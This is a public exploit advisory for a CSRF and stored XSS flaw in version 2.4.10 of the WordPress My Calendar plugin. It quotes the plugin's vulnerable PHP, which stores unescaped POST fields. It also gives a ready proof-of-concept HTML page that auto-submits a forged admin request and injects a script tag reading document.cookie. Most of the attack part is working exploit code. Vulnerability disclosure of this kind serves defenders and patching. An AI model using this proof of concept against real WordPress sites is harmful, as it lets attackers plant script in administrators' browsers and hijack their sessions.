扫码分享
验证:
体验盒子Exploit TItle: My Calendar 2.4.10 CSRF and XSS
Exploit Author : Mysticism (Ahn Sung Jun)
Date : 2015-11-06
Vendor Homepage : http://wordpress.org/plugins/my-calendar
Software Link : https://downloads.wordpress.org/plugin/my-calendar.2.4.10.zip
Version : 2.4.10
Tested On : kail linux Iceweasel
===================
Vulnerable Code : my-calendar-categoris.php
if ( isset( $_POST['mode'] ) && $_POST['mode'] == 'add' ) {
$term = wp_insert_term( $_POST['category_name'], 'mc-event-category' );
if ( ! is_wp_error( $term ) ) {
$term = $term['term_id'];
} else {
$term = false;
}
$add = array(
'category_name'=> $_POST['category_name'],
'category_color' => $_POST['category_color'],
'category_icon'=> $_POST['category_icon'],
'category_private' => ( ( isset( $_POST['category_private'] ) ) ? 1 : 0 ),
'category_term'=> $term
);
}
POC (CSRF & XSS)
<html>
<body onload="javascript:document.forms[0].submit()">
<form id="my-calendar" method="post" action="http://192.168.0.2/wordpress/wp-admin/admin.php?page=my-calendar-categories">
<input type="hidden" name="_wpnonce" value="35ed9ab206"/>
<input type="hidden" name="mode" value="add"/>
<input type="hidden" name="category_id" value="4"/>
<input name="category_name"id="cat_name" type="hidden" class="input" size="30" value="<script>alert(document.cookie)</script>">
<input type="hidden" id="cat_color" name="category_color" class="mc-color-input" size="10" maxlength="7" value=""/>
<input type="hidden" value="on" name="category_private" id="cat_private" />
<input type="hidden" value="on" name="mc_default_category" id="mc_default_category" />
<input type="hidden" value="on" name="mc_skip_holidays_category" id="mc_shc" />
<input type="submit" name="save" class="button-primary" value="Add Category »"/>
</form>
</html>
Discovered By
Mysticism(Ahn Sung Jun)
体验盒子
